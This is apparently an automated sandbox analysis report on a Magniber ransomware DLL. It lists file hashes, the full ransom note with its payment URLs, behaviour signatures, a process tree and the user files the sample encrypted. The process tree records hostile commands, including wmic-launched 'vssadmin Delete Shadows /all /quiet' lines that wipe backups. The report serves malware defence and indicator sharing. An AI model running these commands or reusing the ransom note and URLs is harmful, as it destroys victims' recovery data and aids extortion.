Overview

overview

10

Static

static

10b9b1d8f6...0e.dll

windows7_x64

10

10b9b1d8f6...0e.dll

windows10_x64

10

Resubmissions

12-04-2023 09:01

230412-kzbvhsbb72 10

25-05-2022 10:14

220525-l9q8madfeq 10

Analysis

  • max time kernel
    51s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    25-05-2022 10:14

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e.dll

  • Size

    21KB

  • MD5

    a60c5212d52fe1488d2f82989a2947d2

  • SHA1

    0a744d6c76902d28eb6687d66c18b0a354f29b9d

  • SHA256

    10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e

  • SHA512

    afd14daa5bd9448e09f25d561e8be34e16f93a2825129d165e817a4a2a3ffc339efefd6f26e78c4853acfbce7f51c88b81601324b123d8c377d72da15dcf9327

Score
10/10
magniberransomware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note
ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED! ==================================================================================================== Your files are NOT damaged! Your files are modified only. This modification is reversible. The only 1 way to decrypt your files is to receive the private key and decryption program. Any attempts to restore your files with the third party software will be fatal for your files! ==================================================================================================== To receive the private key and decryption program follow the instructions below: 1. Download "Tor Browser" from https://www.torproject.org/ and install it. 2. In the "Tor Browser" open your personal page here: http://2e1c34a05218a2003cdihlxbl.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dihlxbl Note! This page is available via "Tor Browser" only. ==================================================================================================== Also you can use temporary addresses on your personal page without using "Tor Browser": http://2e1c34a05218a2003cdihlxbl.uponmix.xyz/dihlxbl http://2e1c34a05218a2003cdihlxbl.flysex.space/dihlxbl http://2e1c34a05218a2003cdihlxbl.partscs.site/dihlxbl http://2e1c34a05218a2003cdihlxbl.codehes.uno/dihlxbl Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://2e1c34a05218a2003cdihlxbl.l5nmxg2syswnc6s3724evnip5uktj7msy3pgowkbcidbei3nbysi7ead.onion/dihlxbl

http://2e1c34a05218a2003cdihlxbl.uponmix.xyz/dihlxbl

http://2e1c34a05218a2003cdihlxbl.flysex.space/dihlxbl

http://2e1c34a05218a2003cdihlxbl.partscs.site/dihlxbl

http://2e1c34a05218a2003cdihlxbl.codehes.uno/dihlxbl

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

    ransomwaremagniber
  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

    ransomware
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

    ransomware
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of UnmapMainImage 2 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of UnmapMainImage
    • Suspicious use of WriteProcessMemory
    PID:1372
    • C:\Windows\system32\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\10b9b1d8f6bafd9bb57ccfb1da4a658f10207d566781fa5fb3c4394d283e860e.dll,#1
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1928
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:288
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
            PID:1652
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1628
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1060
    • C:\Windows\system32\Dwm.exe
      "C:\Windows\system32\Dwm.exe"
      1⤵
      • Modifies extensions of user files
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1316
      • C:\Windows\system32\notepad.exe
        notepad.exe C:\Users\Public\readme.txt
        2⤵
        • Opens file in notepad (likely ransom note)
        • Suspicious use of FindShellTrayWindow
        PID:1336
      • C:\Windows\system32\cmd.exe
        cmd /c "start http://2e1c34a05218a2003cdihlxbl.uponmix.xyz/dihlxbl^&1^&43399969^&80^&367^&12"
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1896
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" http://2e1c34a05218a2003cdihlxbl.uponmix.xyz/dihlxbl&1&43399969&80&367&12
          3⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1640
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1640 CREDAT:275457 /prefetch:2
            4⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1208
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1208
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1044
    • C:\Windows\system32\taskhost.exe
      "taskhost.exe"
      1⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1228
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:580
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          3⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:936
    • C:\Windows\system32\cmd.exe
      cmd /c CompMgmtLauncher.exe
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1592
      • C:\Windows\system32\CompMgmtLauncher.exe
        CompMgmtLauncher.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:1932
        • C:\Windows\system32\wbem\wmic.exe
          "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
          3⤵
            PID:1388
      • C:\Windows\system32\cmd.exe
        cmd /c CompMgmtLauncher.exe
        1⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:1608
        • C:\Windows\system32\CompMgmtLauncher.exe
          CompMgmtLauncher.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:832
          • C:\Windows\system32\wbem\wmic.exe
            "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
            3⤵
              PID:1708
        • C:\Windows\system32\cmd.exe
          cmd /c CompMgmtLauncher.exe
          1⤵
          • Process spawned unexpected child process
          • Suspicious use of WriteProcessMemory
          PID:1624
          • C:\Windows\system32\CompMgmtLauncher.exe
            CompMgmtLauncher.exe
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:1144
            • C:\Windows\system32\wbem\wmic.exe
              "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
              3⤵
                PID:772
          • C:\Windows\system32\cmd.exe
            cmd /c CompMgmtLauncher.exe
            1⤵
            • Process spawned unexpected child process
            • Suspicious use of WriteProcessMemory
            PID:1580
            • C:\Windows\system32\CompMgmtLauncher.exe
              CompMgmtLauncher.exe
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1360
              • C:\Windows\system32\wbem\wmic.exe
                "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
                3⤵
                  PID:892
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:2020
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:1464
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:836
            • C:\Windows\system32\vssadmin.exe
              vssadmin.exe Delete Shadows /all /quiet
              1⤵
              • Process spawned unexpected child process
              • Interacts with shadow copies
              PID:1728
            • C:\Windows\system32\vssvc.exe
              C:\Windows\system32\vssvc.exe
              1⤵
                PID:1712

              Network

              MITRE ATT&CK Enterprise v6

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\Desktop\ClearInstall.vb.dihlxbl
                Filesize

                699KB

                MD5

                15eafb1e225a625f0fe2cd4a0f1c1731

                SHA1

                a51d17ac2313d3cda9bdb33aec02389dcf9e3039

                SHA256

                6906189cb96ee3dfe29d2d454f49362222947f970b6dbeedf1bf0acee18f2267

                SHA512

                dfd191963ba6d06a75f64987136b998979545a46e84e520e00b2a4dbb131c71570f9ad2a5e552f9895404f38ba499ed5ce62ac2083fddff1503005a8ef79caff

                Download Submit

              • C:\Users\Admin\Desktop\CompressBackup.zip.dihlxbl
                Filesize

                745KB

                MD5

                0a4b5e1b3b074c1feaab061d9f99e4fd

                SHA1

                00de65d207b5cd66c41a09ed7587f8bc6076dacd

                SHA256

                8785ff5f52f273ad81313ea70ed4e55eda4e4b1c162865f1d04370e0da1b73de

                SHA512

                ec8dac75478991fb11c3c763b32fb9b52db16a3d6a769581aaa45938bade476c518ce1045ccd9fc59b8502c1e186b0fd1da3e624377d86bc313f61c98c46599c

                Download Submit

              • C:\Users\Admin\Desktop\ConnectSet.zip.dihlxbl
                Filesize

                653KB

                MD5

                5ca510fc00151f2fb22de87f297459c1

                SHA1

                e871186a10f7b2010a366141af9dedaaee093aaa

                SHA256

                9f4bb40486a45c3e15d1012d829a16a8c1d31c81a6648e71dcd31beec84e0ab4

                SHA512

                f03e93095ad761f071a5c1923d9efb7371bd7ff32f56bf3dc243f1416eeb8de932150e3ad568ff8c6b8315f7b722b80ed242301a0476a8e85be6c09fde48b077

                Download Submit

              • C:\Users\Admin\Desktop\EnableStep.dib.dihlxbl
                Filesize

                332KB

                MD5

                dfddbe4f7b2ac4df3957bff71327b39a

                SHA1

                7f97bc69591bb4e40a78b61046b42deef9b21005

                SHA256

                82bcc596cb40fd52c1626ac18576992fe13055b5964ca43d40178d72945b066b

                SHA512

                9cea42fadf2762bb6571bc7c5a3783084dc02b482cdc58079f8ef8fcb6381aacea18b4692d9806eb1bd21c7cb20f1886ecd045f65644d3317183b1283f10a79b

                Download Submit

              • C:\Users\Admin\Desktop\FindResolve.docx.dihlxbl
                Filesize

                470KB

                MD5

                5a8e5fa48ab11b150668f5e964e627cd

                SHA1

                6996c07ff49d2eddbb39c011e622bf7064bd6a2c

                SHA256

                130aaf5fc25964c4a35f58a514f2bb4861ca783416ce24c87f4137151620aafe

                SHA512

                5060f975096bae2f32f0dfaf66298eff6a898b0a081a20f673bc9bfe539f10eae129de1245f58e8746f383ecb34600efaeb85c953031e3cbdd837f77ef767abd

                Download Submit

              • C:\Users\Admin\Desktop\GroupStop.rar.dihlxbl
                Filesize

                401KB

                MD5

                85be5d46416bc6a2333716af1199f826

                SHA1

                0ef54d0650baaecfaa1d09582959f78a73cd6daf

                SHA256

                226a8653b81055eda6674f59d13af9146e5d58f33a565cdd6be050858be985be

                SHA512

                76ecfdbbfa81450735f5a9c7fb21a0dcf2bdadc0eda9d4b0f2b105d4b14621e7b4ee0e2f8ea2c634b6a8093cdab0ae5e622bb285cb5b13dc5f43f7f224ea70fe

                Download Submit

              • C:\Users\Admin\Desktop\HideClose.bmp.dihlxbl
                Filesize

                608KB

                MD5

                ec699968fc37a73fc08c9cfe6b6e2d02

                SHA1

                371254f7df7dbd2589c5770bb31f891db922cd5d

                SHA256

                d7c6dd1ca5f892bfa4a3708ffffe7d4e60f742108a4ae057d41ed428de07ec07

                SHA512

                69aee0784a9736028822066336f721ca739220d8b879462582b08c3761e969ec8a7fa4376a528800519fc42e09bd57ac5fcff459886b1b04451bb1ec74ceb175

                Download Submit

              • C:\Users\Admin\Desktop\MergeExpand.php.dihlxbl
                Filesize

                493KB

                MD5

                d1a04685dae3c94f0700920e4cf7b807

                SHA1

                869151ec55a59cc16610f8fe36c6f9b1f2c83e21

                SHA256

                17aeb6b9db987db748ff45fdb2333a0dcff6b60e4fb9e3d08f5357d728df7522

                SHA512

                b0e72a32c10b1dec15468a704227fce7a2288e3cdc47194504a3db67775425d47ce7c358cd30bd5eb15e3acf4f9fc36c2fce9f811c90629d01317e9f25078163

                Download Submit

              • C:\Users\Admin\Desktop\MountReceive.jtx.dihlxbl
                Filesize

                791KB

                MD5

                fa72f285d313ce194ad4f2783177ba78

                SHA1

                0b0d7d1ee25c547d9f6fa05f7e805cae7ddf2436

                SHA256

                140a4648834a9781b0882d9d98caa498c59f7357ff48fe42b27bd4afa4abfb4f

                SHA512

                7e43215c6c8bab2ec61899f2e7c0aefa4c20775b74c82e202776375a250e4d5275f6f4f3c9846695e2a77d10be3a39ddcdbef1b46fe2784d80cc1fc6fe4fb42b

                Download Submit

              • C:\Users\Admin\Desktop\RedoOut.xps.dihlxbl
                Filesize

                676KB

                MD5

                1610290ec938cb94ce44d45870079d66

                SHA1

                a4f4e3740177e140b43e1518b2f710dbdabfdd0d

                SHA256

                b61c6a9988a7404932b2c42d57b23ac10f70ccceb83a9346314794ec8579e520

                SHA512

                ba6e1ddcf1915b84516bb842a984d24851c48d0888d98d7c6dd886a4ed6b9f813b8124dcc0b4bb45dc9b6ef004eee562c6363137288279efbfe82f7e1857f408

                Download Submit

              • C:\Users\Admin\Desktop\RequestGet.vstm.dihlxbl
                Filesize

                309KB

                MD5

                e3cde3ab202f005105b88fdcf77d855f

                SHA1

                95acdc22c15b3268a20deaa86dfae95dfe7885df

                SHA256

                5c342e6de5a7a243c6b72c494e4ad9b65503d7ac3c2d9b7472fe5ec2fdde47de

                SHA512

                0499e131734e8ce2cdb86241ec96ca9019df2833f2241501a7f8bd0e5177e3136fb12c8c09777bd7725d40473261e4ad753df44cfe3dc62a18c90b32599e091d

                Download Submit

              • C:\Users\Admin\Desktop\RequestWatch.php.dihlxbl
                Filesize

                631KB

                MD5

                1c29fef5fb6708e3e506947186c47fc7

                SHA1

                073a3ef45169379b35bac00546657d8e1db2c5de

                SHA256

                cca14aa5fbd0ad882922141b2dda048d8d08bda18e3cb7d0f1b02ece9b69a0a0

                SHA512

                7fbf42f56b2603ff235aa9e3483321ed665bb30cd629898a8eddeaef7acc62456b141e7d982e52d9c09486bf7289c7633339b6c8965d2134e351c423a00e54f7

                Download Submit

              • C:\Users\Admin\Desktop\UnpublishConvertTo.mpeg.dihlxbl
                Filesize

                722KB

                MD5

                6473a20841004a360af8265f7f32a608

                SHA1

                346f278730a8c2622a66824dcb03324b66d61d7d

                SHA256

                fa488cefb17a7cc6232d7f880a3265ece5fcb772724c63d30aac1755859db6f2

                SHA512

                1ac25c89e8fac9acd583b2c4103d9f00905104c65d72dd6f6abbde368e92efe0ed0d9b7fbf3bb510986bff7e3041e611da4323c73ee97908736cd4977a76ebc8

                Download Submit

              • C:\Users\Admin\Desktop\readme.txt
                Filesize

                1KB

                MD5

                3b155ef540764cc6c90eaa66357dbef3

                SHA1

                ebe2d8e8e158caa4ff1123ed46f5d719a9f53352

                SHA256

                a24dc483f6b7a2963517b5c1d3ef0aa247d0f0fc4347e1d7f0cff98c85e4f806

                SHA512

                32fe012d348f2deafdf6d56ff1106fa1e886d8c9f6065173a8005261aa58e6a2709686d3170ccac0cb6671cb4bf018f7b7a78e067a70e812335d2e34667f65ed

                Download Submit

              • C:\Users\Public\readme.txt
                Filesize

                1KB

                MD5

                3b155ef540764cc6c90eaa66357dbef3

                SHA1

                ebe2d8e8e158caa4ff1123ed46f5d719a9f53352

                SHA256

                a24dc483f6b7a2963517b5c1d3ef0aa247d0f0fc4347e1d7f0cff98c85e4f806

                SHA512

                32fe012d348f2deafdf6d56ff1106fa1e886d8c9f6065173a8005261aa58e6a2709686d3170ccac0cb6671cb4bf018f7b7a78e067a70e812335d2e34667f65ed

                Download Submit

              • memory/288-76-0x0000000000000000-mapping.dmp

                Download

              • memory/580-66-0x0000000000000000-mapping.dmp

                Download

              • memory/772-110-0x0000000000000000-mapping.dmp

                Download

              • memory/832-106-0x0000000000000000-mapping.dmp

                Download

              • memory/892-112-0x0000000000000000-mapping.dmp

                Download

              • memory/936-74-0x0000000000000000-mapping.dmp

                Download

              • memory/1044-64-0x0000000000000000-mapping.dmp

                Download

              • memory/1060-77-0x0000000000000000-mapping.dmp

                Download

              • memory/1144-104-0x0000000000000000-mapping.dmp

                Download

              • memory/1208-58-0x0000000000000000-mapping.dmp

                Download

              • memory/1228-69-0x0000000000290000-0x0000000000294000-memory.dmp

                Filesize

                16KB

                Download

              • memory/1336-55-0x000007FEFC061000-0x000007FEFC063000-memory.dmp

                Filesize

                8KB

                Download

              • memory/1336-54-0x0000000000000000-mapping.dmp

                Download

              • memory/1360-105-0x0000000000000000-mapping.dmp

                Download

              • memory/1388-111-0x0000000000000000-mapping.dmp

                Download

              • memory/1628-72-0x0000000000000000-mapping.dmp

                Download

              • memory/1652-101-0x0000000000000000-mapping.dmp

                Download

              • memory/1708-113-0x0000000000000000-mapping.dmp

                Download

              • memory/1896-57-0x0000000000000000-mapping.dmp

                Download

              • memory/1932-102-0x0000000000000000-mapping.dmp

                Download